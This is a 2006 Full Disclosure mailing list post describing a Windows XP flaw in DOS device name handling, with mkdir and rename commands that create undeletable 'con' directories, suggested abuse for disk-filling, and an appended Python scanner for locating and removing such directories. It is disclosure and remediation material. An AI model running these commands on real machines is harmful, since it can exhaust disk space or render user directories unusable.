Full Disclosure mailing list archives
DOS device name handling
From: Klaudiusz Kulik <kulikk () monstrum org>
Date: Mon, 1 May 2006 18:06:22 +0200
Hi.

* Overview:

Vulnerability exists in Windows XP SP2 (others may also be affected), probably due to an error within the handling of special DOS device names. In March 2000 Microsoft patched a similar problem in Windows 98:
http://www.microsoft.com/downloads/details.aspx?displaylang=en&FamilyID=4C6FD7E5-A66E-4A08-B782-2A64C77B95B6

* Environment:

I tried this on Polish Windows XP SP2 with the latest patches. Command outputs are translated into English, so they are not identical to those in the English version of XP.

* Description:

Using simple mkdir and rename commands it is possible to make a directory structure which then cannot be removed from disk without special, third-party tools. Because even an empty directory occupies some amount of disk space, this vulnerability may be used against a user's machine by creating millions of prepared, non-erasable directories. Another scenario may be renaming a system or user's directory to an invalid name.

* Details:

In theory, Windows does not allow programs to create a directory containing special DOS device names (e.g. CON, LPT1, COM1, PRN). By simply adding a slash '/' character at the end of the directory name, that protection fails.

* Example:

Assume we are on the root of drive C:

Creating...

    mkdir "/foo/foo/foo/foo"

Valid directory structure C:\foo\foo\foo\foo created.

... and renaming:

    cd \foo\foo\foo
    rename "foo" "con/"
    cd ..
    rename "foo" "con/"
    cd ..
    rename "foo" "con/"
    cd ..
    rename "foo" "con/"
    C:\

Now the directory structure is: C:\con\con\con\con

Please note that this is a one-way operation. Renaming from "con/" or "con" to "foo" does not work. However, if the directory has only one level (C:\con) and is empty or contains "normal" entries, it is possible to remove it.

Now, let's try to browse:

    C:\cd "con"
    System nie może odnaleźć określonej ścieżki.
    [System can not find appropriate path.]

    C:\cd "con/"
    Nazwa katalogu jest nieprawidłowa.
    [Invalid directory name.]

Let's try to rename:

    C:\rename "con" "foo"
    System nie może odnaleźć określonej ścieżki.
    [System can not find appropriate path.]

    C:\rename "con/" "foo"
    Nie można odnaleźć określonego pliku.
    [Could not find appropriate file.]

And finally - removing:

    C:\>rmdir /S "con/"
    con/, Czy na pewno (T/N)? t
    [Are You sure (Y/N)?]
    con/\con\con\con\con - Nie można odnaleźć określonego pliku.
    con/\con\con\con - Nie można odnaleźć określonego pliku.
    con/\con\con - Nie można odnaleźć określonego pliku.
    con/\con - Nie można odnaleźć określonego pliku.
    [Could not find appropriate file.]

Directory exists.

    C:\erase /S /Q "con"
    Nie można odnaleźć \\.\con.
    [Could not find \\.\con.]

Please note the strange path.

    C:\erase /S /Q "con/"
    C:\

Directory *still* exists.

Windows Explorer can browse the directory, but renaming or removing fails. It looks like there is no simple way to remove C:\con from a disk.

--
K.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
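
An added example, not part of the original post: a Python sketch for finding directories like the C:\con tree described above and building the `\\?\` extended-length form of their path, the documented Win32 prefix that turns off device-name parsing so that standard tools can address such entries. The reserved-name set (the classic CON, PRN, AUX, NUL, COM1-9, LPT1-9) and all function names are assumptions of this example.

```python
import ntpath
import os
import sys

# Classic DOS device names reserved by the Win32 path layer (assumed set).
RESERVED = {"CON", "PRN", "AUX", "NUL"} | {
    f"{dev}{n}" for dev in ("COM", "LPT") for n in range(1, 10)
}
EXTENDED_PREFIX = "\\\\?\\"  # the four characters \\?\


def is_reserved_component(name: str) -> bool:
    """True if a single path component resolves to a DOS device name."""
    # Tolerate the trailing separator used in the post ("con/").
    name = name.rstrip("/\\")
    # Win32 ignores an extension and trailing spaces: "nul.txt" is NUL.
    stem = name.split(".", 1)[0].rstrip(" ")
    return stem.upper() in RESERVED


def find_reserved_dirs(root: str) -> list[str]:
    """Return every directory under root whose own name is reserved."""
    hits = []
    for parent, dirs, _files in os.walk(root):
        for d in dirs:
            if is_reserved_component(d):
                hits.append(os.path.join(parent, d))
    return sorted(hits)


def extended_path(win_path: str) -> str:
    """Return the extended-length form of an absolute drive path."""
    if win_path.startswith(EXTENDED_PREFIX):
        return win_path
    full = ntpath.normpath(win_path)  # '/' -> '\', drop trailing separator
    drive, _rest = ntpath.splitdrive(full)
    if len(drive) != 2 or not ntpath.isabs(full):
        raise ValueError("need an absolute path with a drive letter")
    return EXTENDED_PREFIX + full


if __name__ == "__main__":
    # Usage: python scan.py C:\  (prints each hit in its extended form)
    for hit in find_reserved_dirs(sys.argv[1]):
        print(extended_path(os.path.abspath(hit)))
```

Each printed path can be passed to `rmdir`, deepest directory first, since the Win32 layer hands a `\\?\` path to the file system without applying the device-name check.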